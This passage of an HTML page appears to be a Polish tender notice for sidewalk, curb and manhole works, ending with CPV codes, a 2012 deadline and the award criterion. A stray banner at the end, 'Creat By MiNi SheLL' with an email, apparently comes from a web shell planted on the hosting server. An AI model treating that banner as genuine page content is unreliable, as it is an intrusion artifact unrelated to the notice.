c)  budowa chodnika  o powierzchni  600,00 m2  oraz zjazdów o powierzchni 150,00 m2;            
d)  ułożenie krawężnika  160,00 mb oraz ułożenie obrzeża 250 mb; 
e)  regulacja istniejących studzienek rewizyjnych wraz z wymianą włazów żeliwnych  (6 szt);, 
f)   obsługa geodezyjna,  organizacja ruchu; 
g)  inne prace  towarzyszące wykonaniu zamówienia.      

Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne,  dane dotyczące konstrukcji nawierzchni  jak również  sposób odwodnienia określają zapisy niniejszego rozdziału oraz zostały  określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr  7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com